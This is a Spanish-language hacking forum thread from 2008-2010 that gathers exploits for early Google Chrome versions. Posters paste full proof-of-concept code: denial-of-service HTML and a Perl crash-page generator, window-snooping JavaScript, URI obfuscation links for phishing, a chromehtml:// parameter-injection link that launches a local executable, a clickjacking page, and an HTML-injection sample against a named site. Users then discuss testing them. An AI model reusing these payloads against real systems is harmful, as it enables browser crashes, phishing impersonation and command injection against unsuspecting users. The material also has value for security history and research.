 Autor
|
Tema: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32 (Leído 25,994 veces)
|
MabUse
 Desconectado
Mensajes: 1
|
<script> var snoopWin; function run() { snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/','snoopWindow','width=640,height=480'); snoopWin.blur(); setTimeout("snoopy()",1000); } function snoopy() { alert(snoopWin.location); setTimeout("snoopy()", 100); } </script> <a href="javascript:run();">http://www.google.com/</a> But, if: <script> var snoopWin; function run() { snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/','snoopWindow','width=640,height=480'); snoopWin.blur(); setTimeout("snoopy()",1000); } function snoopy() { alert(snoopWin.location); setTimeout("snoopy()", 1000); } </script> <a href="javascript:run();">http://www.google.com/</a>
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
Portal dedicado a las vulnerabilidades de Chrome: Google Chrome Silent Crash Exploit
Google Chrome Inspect Element DoS Exploit
Google Chrome Buffer Overflow
Google Chrome Invalid URL Crash
Google Chrome Omnibox Keylogger
Google Chrome Comic Book
Uninstalling Chrome - Is it something we said.
Google Chrome Carpet Bombing Vulnerability
Chrome Keyboard Shortcuts
Chrome Easter Eggs
Google Chrome Released
Muy gracioso los comics, ademas los Chrome Easter Eggs, como todo programa oculta los credits y demas sopresas, pero tambien informacion valiosa para algun atacante: about:internets
about:version
about:stats
about:memory
about:plugins
about:histograms
about:cache
about:dns
about:network
about:crash
about:hang (can crash your browser)
about:% (can crash your browser)
Me resulto bastante bueno al ejecutar "about:memory" la cantidad de memoria que consume Firefox comparado con Chrome. fuente: http://chromekb.com-berz3k.
|
|
|
|
|
En línea
|
|
|
|
WHK
吴阿卡
Moderador Global
Desconectado
Mensajes: 3.944
The Hacktivism is not a crime
|
Se ve bueno el sitio. http://chromekb.com/vulnerabilities/"><h1>ARREGLENMEE!</h1> fuente:http://www.jccharry.com/fake/1.txt |
|
|
|
« Última modificación: 9 Septiembre 2008, 08:58 por WHK »
|
En línea
|
|
|
|
|
berz3k
|
Google fixea vulnerabilidades en su navegador Chrome Google Releases New Browser Chrome - Vulnerabilities on First DaySo as most of you probably know the big buzz on the Internet last week was that Google (after supporting Firefox for so long) have actually launched their own browser. It’s cooled Google Chrome. Now of course in typical Google fashion they call it BETA software, and a number of flaws have popped up during the first couple of days of release. One cool thing though is that each tab runs it’s own threaded process, so if one tab bombs out it won’t take down your whole browser. The browser is a move for Google into the online/offline integration they started with Google Desktop, there are more and more online apps (Google Office) that people still want to use offline with a Google made browser this will be possible. You also have to consider the privacy implications though, if you are also using Gmail…Google will basically know everything you do, even worse if you also use Google Desktop they will know what you have on your computer, what e-mail you send and receive and what you surf on the web. Curioso video donde los ciudadanos Alemanes no usaran Chrome, lo olvide postear antes:http://valleywag.com/5046665/german-government-tells-citizens-not-to-use-google-chromeAbra que testear lo nuevo de Chrome. -berz3k. |
|
|
|
« Última modificación: 25 Septiembre 2008, 03:16 por berz3k »
|
En línea
|
|
|
|
|
berz3k
|
Nuevo Exploit en milw0rm Versiones afectadas
Chrome/0.2.149.29
Chrome/0.2.149.30
<html> <title>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.</title> <head> <script language="javascript"> window.open("\r\n\r\n"); window.refresh(); window.open("\r\n\r\n"); </script> </head> <body><br><br> <h2><center>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Denial of Service.<br><br>Proof of Concept</br></br> </center></h2> <center> <b>Note:: Keep an eye on the memory consumption in Task Manager.</b><br><br> <hr></hr> <b>This POC has been designed with minimum object usage. This can be made more critical when combined with number of objects. For Example: using alert function will make it more exhaustive.</b></br></br> <b><br>Aditya K Sood<br> (c) SecNiche Security.<br><a href="http://www.secniche.org">http://www.secniche.org</a></br></b> <hr></hr></center> <b>Version Tested:<br><br>Official Build 1798<br> Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br> AppleWebKit/525.13 (KHTML, like Gecko)<br> Chrome/0.2.149.29 Safari/525.13 <br><br> Official Build 2200<br> Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) <br>AppleWebKit/525.13 (KHTML, like Gecko) <br>Chrome/0.2.149.30 Safari/525.13 </b> <hr></hr> </body> </html> -berz3k. |
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
Versiones afectadas
Chrome/0.2.149.30
Chrome/0.2.149.29
Chrome/0.2.149.27
fuente:http://www.milw0rm.com/exploits/6609 Remote DoS Exploit
<html>
<head>
<title>Google Chrome Window Object Suppressing Remote Denial of Service.</title>
</head>
<body onLoad="window.close();">
<center>
<b>Note: Design Flaw.Zero Security Check. Script Can Be Used to Kill Parent Window Directly Leading to Denial of Service.</b><br><br>
</center>
</body>
</html>
 
|
|
|
|
« Última modificación: 30 Septiembre 2008, 03:40 por berz3k »
|
En línea
|
|
|
|
|
berz3k
|
Google Chrome MetaCharacter URI Obfuscation VulnerabilityGoogle chrome is vulnerable to URI Obfuscation vulnerability. An attacker can easily perform malicious redirection by manipulating the browser functionality. The link can not be traversed properly in status address bar.This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users. The URI specified with @ character with or without NULL character causes the vulnerability. Vulnerable Systems: * Chrome version 0.2.149.30 * Chrome version 0.2.149.29 * Chrome version 0.2.149.27 Proof of Concept:Link1: http://ftp://anoymous:guest@microsoft.comLink2: [Without NULL] | http://www.google.com@yahoo.com | [Google --> Yahoo [Obfuscation]] Link3: http://www.secniche.org%00@www.milw0rm.com [With NULL] SecNiche --> Milw0rm [Obfuscation] fuente: http://www.secniche.org/gcuri/index.html-berz3k.
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
Nuevo Exploit 23.12.2008Vulnerable Systems:* Chrome version 1.0.154.36 Google Chrome Browser (ChromeHTML://) Remote Parameter Injection fuente: http://www.milw0rm.com<!-- Google Chrome Browser (ChromeHTML://) remote parameter injection POC by Nine:Situations:Group::bellick&strawdog Site: http://retrogod.altervista.org/ tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3 List of command line switches: http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc Original url: http://retrogod.altervista.org/9sg_chrome.html click the following link with IE while monitoring with procmon --> <a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
Windows Vista SP1, que alguien confirme el bug en XP SP3 con algun PoC  -berz3k.
|
|
|
|
|
En línea
|
|
|
|
Novlucker
Ninja y
Ex-Staff
Desconectado
Mensajes: 10.225
Yo que tu lo pienso dos veces
|
Bueno, menos mal que berz3k ha posteado hace algunos días, así evito tener que revivir un post viejo  Curiosidad: Alguien ha "jugado" con la versión final/estable de chrome y los fallos que se encuentran en este post? Es que me gustaría saber si los de google han arreglado algo o estos errores permanecen  , sino tocará probar por mi mismo Saludos |
|
|
|
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
|
berz3k
|
@Novlucker La gran mayoria estan fixeados (he jugado con todos) excepto este ultimo que he probado sobre vista, vaya; se que es un bug que afecta a XP sp3, tendre que revivir mi vieja laptop  . -berz3k. |
|
|
|
|
En línea
|
|
|
|
THAL
Desconectado
Mensajes: 58
|
Una vez abierto google chrome cuand busco cualquier tema, me sale este error:
mc7cQ7Hk���S���"�:�n�.����X�P
o este:
mc7cQ7Hk���S���"�3�g�'����1�N
Alguna sugerencia?
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
@THAL
Que version haz instalado Linux/Win32? , seguramente no se ha instalado correctamente, postearme una screen y los pasos que ejecutas para conocer el bug.
-berz3k.
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
Nuevo Exploit 23.01.2009Vulnerable Systems:* Chrome version 1.0.154.43
Google Chrome 1.0.154.43 ClickJacking Vulnerability (2009-01-23)
fuente: http://www.milw0rm.com/exploits/7903<html> <style type="text/css"> <!-- .style1 { font-size: 50px; font-weight: bold; } .style2 { color: #FF0000; font-weight: bold; font-size: 24px; } --> </style> <body> <span class="style2">x0x</span> <div class="style1" id="open" style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;" onmouseover="document.location='http://www.cyber-warrior.org/x0x';">This</div> <p><strong> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('open').style.left=mouseX-2; document.getElementById('open').style.top=mouseY-2; } </script> </strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p> <p><br> </p> </html>  MMMMM, a todos les funciona? me parece no se este ejecutando bien does any1 with more details? -berz3k.
|
|
|
|
|
En línea
|
|
|
|
|
|
|
berz3k
|
Nuevo DoS PoC 2010-01-03 Google Chrome 4.0.249.30 DoS PoC Fuente: :http://www.exploit-db.com/exploits/10960 Exploit:
#!/usr/bin/perl
#google chrome 4.0.249.30 DoS PoC
#
#
#Author: Teo Manojlovic
#
#Info: In ordinary cases browser would redirect to "http://www.google.com"
#but in this case browser will report error for something that should
#be possible and is possible on other browsers.
#
#
#
#I would like to thank Jeremy Brown who made very nice fuzzer for browser
#
#
#
#
#
#
#
#Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa
$file="poc.html";
$poc='a/' x 10000000;
open(myfile,">>$file");
print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
print myfile "<body alink=";
print myfile $poc;
print myfile '">';
close(myfile);
print "Finished\n";
PoC DoS  Lo he probado en la version 3.0.195.38, no he actualizado posteen link para descargar la version 4.0.249.30 y testear este PoC. -berz3k.
|
|
|
|
|
En línea
|
|
|
|
|
 |
